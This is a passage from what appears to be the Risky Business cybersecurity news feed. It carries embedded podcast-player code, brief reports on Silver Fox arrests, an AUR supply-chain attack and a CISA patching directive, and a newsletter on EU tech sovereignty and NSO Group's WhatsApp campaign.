player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Why NATO and cyber don&apos;t mix&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/SYy15pdDuZ0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Why NATO and cyber don&apos;t mix"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>China arrests members of Silver Fox cybercrime group: </strong>Chinese police have arrested 67 suspects linked to Silver Fox, the country&apos;s largest and most active cybercrime group targeting its domestic audiences.</p><p>Arrests took place across five provinces and targeted everyone from developers to phishing site operators and various affiliates.</p><p>Authorities identified a man named Ji Moufei as the main individual who wrote and sold the group&apos;s malware, the eponymous Silver Fox trojan. Ji and four associates were arrested in Zhejiang.</p><p>Twenty-eight others were also arrested in the Jilin province, including a man named Chen, described as having developed a variant of the group&apos;s trojan.</p><p>[<a href="https://news.risky.biz/risky-bulletin-china-arrests-members-of-silver-fox-cybercrime-group/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Arch Linux supply chain attack spreads to 1,900+ AUR packages:&#xA0;</strong></p><p>More than 1,900 Arch Linux packages have been hijacked over the weekend as part of a massive supply chain attack designed to infect users with a rootkit and a credentials harvester.</p><p>The attacker(s) targeted Arch Linux packages hosted on the <a href="https://aur.archlinux.org/"><u>AUR portal</u></a>, an unofficial repository of Arch packages created by the community. The portal hosts a massive 100,000 entries, but almost a tenth have been abandoned by their maintainers in what AUR calls &quot;orphaned packages.&quot;</p><p>The attack exploited an AUR mechanism that allowed the hacker to &quot;adopt&quot; the abandoned packages and become a maintainer.</p><p>[<a href="https://news.risky.biz/risky-bulletin-arch-linux-supply-chain-attack-spreads-to-1-900-aur-packages/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>In the age of AI, CISA changes federal patching rules: </strong>The US Cybersecurity and Infrastructure Security Agency (CISA) <a href="https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk"><u>issued</u></a> a new binding operational directive (BOD) this week that updates the patching rules for federal civilian agencies.</p><p>The new order cites the rise of AI-automated attacks as the main reason to prioritize bugs based on the risk they pose to federal networks and shorten patching deadlines.</p><p>The order introduces a new decision tree (pictured in the linked article) that will prioritize vulnerabilities that are exploited in the wild, are easy to exploit and automate, and grant broad access to a system if they have been exploited.</p><p>[<a href="https://news.risky.biz/risky-bulletin-in-the-age-of-ai-cisa-changes-federal-patching-rules/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  106. Srsly Risky Biz: Europe Wants To Wean Itself Off US Tech

    Thu, 11 Jun 2026 06:44:54 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://specterops.io/"><em><u>SpectreOps</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f-1.jpeg" alt="Srsly Risky Biz: Europe Wants To Wean Itself Off US Tech"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://specterops.io/"><em><u>SpectreOps</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB170.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB170/&quot;&gt;Srsly Risky Biz: Europe wants to wean itself off US tech&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 19:48 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Europe wants to wean itself off US tech&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f.jpeg" class="kg-image" alt="Srsly Risky Biz: Europe Wants To Wean Itself Off US Tech" loading="lazy" width="2000" height="1333" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-c734f447-3ac3-4ad3-bf12-63428c04bc0f.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@gogostevie?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Stephen Harlan</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/a-padlock-attached-to-a-red-bike-with-the-words-didnt-work-on-74fdSnrgloI?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>The European Union Commission has proposed a tech sovereignty package that covers a range of initiatives around semiconductors, cloud computing and AI. We&apos;d be surprised if these initiatives have a major impact in the short term, but this is still a good move for Europe.&#xA0;</p><p>The key initiative of the proposed package, in our view, is the <a href="https://digital-strategy.ec.europa.eu/en/factpages/eu-open-source-strategy"><u>Open Source Strategy</u></a> which aims to &quot;strengthen digital autonomy through open source&quot;. Although it&apos;s not stated explicitly, the intent here is to wean Europe off the US tech stack by encouraging open source alternatives.&#xA0;</p><p>The strategy says it will take &quot;concrete actions&quot;, for example reforming government procurement rules to make them more open source friendly. EU governments will also award grants to open source projects under the strategy.&#xA0;</p><p>European distrust of the US government and American tech companies has been brewing since the International Criminal Court&apos;s chief prosecutor Karim Khan had his <a href="https://apnews.com/article/icc-trump-sanctions-karim-khan-court-a4b4c02751ab84c09718b1b95cbd5db3"><u>Microsoft email services suspended</u></a>. The services were cut when the court <a href="https://www.whitehouse.gov/presidential-actions/2025/02/imposing-sanctions-on-the-international-criminal-court/"><u>was sanctioned</u></a> by US President Donald Trump in May 2025.</p><p>And just this month <a href="https://meduza.io/en/news/2026/06/05/apple-says-sanctions-rules-forced-it-to-drop-russia-s-state-backed-max-app"><u>Apple removed</u></a> the Russian <a href="https://en.wikipedia.org/wiki/Max_(app)"><u>messaging app Max</u></a> from its App Store and stopped delivering the app&apos;s push notifications due to sanctions. This effectively kills the Russian government&apos;s efforts to push its population onto a surveillance-friendly national messenger, at least on the iOS platform.&#xA0;</p><p>Russia is not the European Union, of course, but the EU is nonetheless twitchy about the US tech sector applying similar measures against its member states at the behest of the White House. Since 2025 President Trump has spoken of <a href="https://en.wikipedia.org/wiki/Greenland_crisis"><u>annexing Greenland</u></a> and <a href="https://www.bbc.com/news/articles/czx82j5wd8vo"><u>Canada</u></a> and has <a href="https://www.theguardian.com/world/2026/apr/01/trump-says-he-is-absolutely-considering-withdrawing-us-from-nato"><u>threatened to withdraw</u></a> the US from NATO. You know, totally normal stuff!</p><p>One visible manifestation of this lack of trust is that European governments are <a href="https://news.risky.biz/srsly-risky-biz-politicians-to-ditch-signal-for-homegrown-apps/"><u>already </u></a>dumping American messaging platforms in favour of open source secure messengers. This year the French government has also announced that it is <a href="https://apnews.com/article/europe-digital-sovereignty-big-tech-9f5388b68a0648514cebc8d92f682060"><u>binning Microsoft Teams, Zoom</u></a>, and <a href="https://thenextweb.com/news/france-linux-windows-migration-digital-sovereignty"><u>replacing Windows with Linux</u></a> where it can.&#xA0;</p><p>In addition to bolstering European sovereignty, the strategy&apos;s <a href="https://digital-strategy.ec.europa.eu/en/factpages/eu-open-source-strategy"><u>fact page</u></a> says using open source could also be cheaper <em>and</em> more secure.&#xA0;</p><p>Another area of focus in the sovereignty package is semiconductors. Europe does have some chip champions, such as the <a href="https://en.wikipedia.org/wiki/ASML"><u>Dutch lithography company ASML</u></a>, but the continent collectively supplies less than 10% of global semiconductors.&#xA0;</p><p>The main objectives of the proposed European <a href="https://digital-strategy.ec.europa.eu/en/policies/chips-act-2"><u>Chips 2.0 efforts</u></a> are to improve investment conditions, accelerate approvals processes and essentially encourage customers to buy European. Given this intense global competition, where <a href="https://smartincentives.org/tracking-chips-act-incentives/"><u>other governments</u></a> are <em>also </em><a href="https://en.wikipedia.org/wiki/China_Integrated_Circuit_Industry_Investment_Fund"><u>investing in chipmaking initiatives</u></a>, we don&apos;t expect that European efforts will make any discernable difference.&#xA0;</p><p>This feels like it was included in the package because it involves a key area of geopolitical competition, rather than it being an area where the Commission thinks it can make a significant difference.&#xA0;</p><p>Chipmaking is a massive, global industry. Rather than trying to shape a complex global supply chain in the midst of a semiconductor bunfight between the US and China, the EU has rightly concluded there are better things it can spend money on and gone for a light touch here.</p><p>Speaking of better places to spend money, the sovereignty package also aims to triple Europe&apos;s data centre capacity over the next five to seven years. This includes building up to five <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_25_1013"><u>AI Gigafactories</u></a>, &quot;large-scale facilities with 100,000 state-of-the-art AI chips&quot; and speeding up the regulatory approval processes for their construction.&#xA0;&#xA0;&#xA0;&#xA0;&#xA0;</p><p>These are worthy goals, as sovereign software doesn&apos;t buy you all that much technological independence if you don&apos;t also have sovereign infrastructure. However, the limiting factor here is <a href="https://www.eudca.org/new-2026-state-of-european-data-centres"><u>likely to be electricity</u></a>. Unfortunately, Europe&apos;s data centre strategy emphasises data centre <a href="https://energy.ec.europa.eu/topics/energy-efficiency/energy-efficiency-targets-directive-and-rules/energy-efficiency-directive/energy-performance-data-centres_en"><u>energy efficiency</u></a> and sustainability without mapping out how to bring new energy sources online.&#xA0;</p><p>Of course the EU&apos;s shift here is 100% an American own-goal, and a predictable one at that. China&apos;s <a href="https://www.abc.net.au/news/2018-08-23/huawei-banned-from-providing-5g-mobile-technology-australia/10155438"><u>three-ringed</u></a> <a href="https://www.reuters.com/business/media-telecom/eu-phase-out-high-risk-tech-targets-huawei-chinese-companies-2026-01-20/"><u>Huawei circus</u></a> showed the world that, in the long term, a country can have internationally competitive tech giants <em>or</em> an aggressive and coercive foreign policy, but not both.&#xA0;</p><h2 id="nso-groups-reanimated-corpse-targets-whatsapp-users">NSO Group&apos;s Reanimated Corpse Targets WhatsApp Users</h2><p>This week <a href="https://about.fb.com/news/2026/06/fighting-spyware-an-update-from-whatsapp/"><u>Meta announced</u></a> it caught NSO Group targeting its users in a new hacking campaign and is petitioning a court to hold the spyware company in contempt.</p><p>In 2025 a US court <a href="https://courthousenews.com/israeli-spyware-company-blocked-from-whatsapp/"><u>granted a permanent injunction</u></a> preventing NSO Group from targeting WhatsApp&apos;s services. In that court case, NSO argued that the injunction &quot;would put NSO&apos;s entire enterprise at risk&quot; and &quot;force NSO out of business&quot;. Oh no!&#xA0;</p><p>But it seems NSO has had an epiphany here: injunctions can&apos;t slow you down if you ignore them.</p><p>In its announcement this week, Meta said it &quot;successfully disrupted NSO-linked social engineering attempts&quot; that attempted to trick people into clicking malicious links to external websites. It also caught NSO Group creating WhatsApp test accounts and groups.&#xA0;</p><p>What NSO seems to have forgotten is that spyware companies can only employ one of two broad strategies. The first strategy limits sales to customers in the US and allied markets, and vets buyers rigorously. Paragon Solutions, for example, <a href="https://news.risky.biz/good-news-us-investment-in-spyware-skyrockets/"><u>consults with the US government</u></a> to make sure it doesn&apos;t put noses out of joint.&#xA0;</p><p>The second approach is to sell to all and sundry and not give a hoot about due diligence or what your product is used for. For this strategy to work, the company needs to forgo the US market and hope US lawsuits don&apos;t catch up to the company&apos;s founders.&#xA0;</p><p>The fundamental problem for NSO Group is that it has tried using both strategies at the same time. It wanted to <a href="https://www.theguardian.com/news/2022/feb/02/fbi-confirms-it-obtained-nsos-pegasus-spyware"><u>sell its product to US customers</u></a>, while ignoring all <a href="https://forbiddenstories.org/the-rise-and-fall-of-nso-group/"><u>standards</u></a> of responsible behaviour and selling its capabilities to tinpot authoritarian governments that engage in <a href="https://forbiddenstories.org/about-the-pegasus-project/"><u>human rights abuses</u></a>.&#xA0;&#xA0;&#xA0;</p><p>This is how NSO has wound up on the wrong side of the Meta lawsuit and is subject to US <a href="https://www.theguardian.com/us-news/2021/nov/03/nso-group-pegasus-spyware-us-blacklist"><u>government sanctions</u></a>.&#xA0;</p><p>We&apos;ve little doubt that NSO Group has been lobbying the Trump administration for some relief on the sanctions side of things. David Friedman, who was US ambassador to Israel in President Trump&apos;s first administration, <a href="https://therecord.media/former-trump-official-named-nso-group-chairman"><u>was appointed executive chairman</u></a> of NSO Group in November 2025. That hasn&apos;t paid off so far, and the company remains on the <a href="https://en.wikipedia.org/wiki/Entity_List"><u>US Entity List</u></a>.</p><p>Getting busted by Meta ignoring a court injunction in 2026 will not help get it removed from the list! In its blog post about calling out NSO&apos;s latest alleged campaign, Meta actually argued sanctions should remain in place because NSO &quot;continues to defy US courts&quot;.&#xA0;&#xA0;</p><p>We agree, and we actually expect the company&apos;s behaviour to deteriorate further. Per Wednesday&apos;s <em>Risky Bulletin</em>:</p><blockquote>A researcher who tracks spyware operations told <em>Risky Business</em> on Monday that while NSO has lost most of its staff and contracts, its semi-dead legal status has made it more desperate and dangerous, with its tools being used in campaigns that most surveillance vendors would want nothing to do with.</blockquote><p>Back in October 2025 <em>TechCrunch </em><a href="https://techcrunch.com/2025/10/10/spyware-maker-nso-group-confirms-acquisition-by-us-investors/"><u>reported that</u></a> an American investment group bought a controlling stake in the company for &quot;tens of millions of dollars&quot;. At the time <a href="https://news.risky.biz/small-beer-surveillance-firms-escape-crackdown-for-now/#nso-group-from-cyber-unicorn-to-cautionary-tale"><u>we wondered</u></a> whether US investment might result in NSO Group turning a corner and behaving responsibly. We now have our answer: No.&#xA0;</p><p>NSO Group is in a deep deep hole but just keeps digging. Hopefully it will eventually just do the one thing everyone hopes it will: lay down and die.</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Massachusetts lawmakers vote for privacy:</strong> The Massachusetts house voted 146-0 to pass a privacy bill that would block the sharing or sale of sensitive information without a user&apos;s explicit consent. <a href="https://techcrunch.com/2026/06/08/massachusetts-votes-to-pass-new-privacy-rights-bill-that-bans-sale-of-precise-location-data/"><u>Further coverage</u></a> at <em>TechCrunch</em>.</li><li><strong>Anthropic has an AI model release strategy:</strong> In <a href="https://www.anthropic.com/news/expanding-project-glasswing"><u>separate posts</u></a> over <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5"><u>the last week</u></a>, Anthropic announced a two-tier approach to granting access to its cutting edge models. Access to the newly released Claude Mythos 5, its most capable model, is being granted to a small number of organisations in <a href="https://www.anthropic.com/glasswing"><u>Project Glasswing</u></a>. For general use it has also launched Claude Fable 5, the same underlying model with stronger cyber security safeguards. The good news is that this seems like a reasonable strategy for safer release of frontier models, although we&apos;ve got no idea how effective it will be.&#xA0;&#xA0;</li><li><strong>Bulletproof host shuts down:</strong> THE.Hosting Group <a href="https://the.hosting/en/news/notice-of-service-discontinuation-and-account-closure"><u>has shut down</u></a> operations <a href="https://krebsonsecurity.com/2026/05/netherlands-seizes-800-servers-arrests-2-for-aiding-cyberattacks/"><u>after raids</u></a> on two of its member companies last month. Dutch police seized more than 800 servers and arrested the two co-owners of the companies. The parent group was a rebrand of Stark Industries, a bulletproof hosting provider that was sanctioned by the EU for hosting Russian hacking and disinformation infrastructure.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Tom Uren talks to Justin Kohler, Chief Product Officer at SpecterOps, about how attack paths exist in the seams between different identity or permissions management domains.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI111.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; 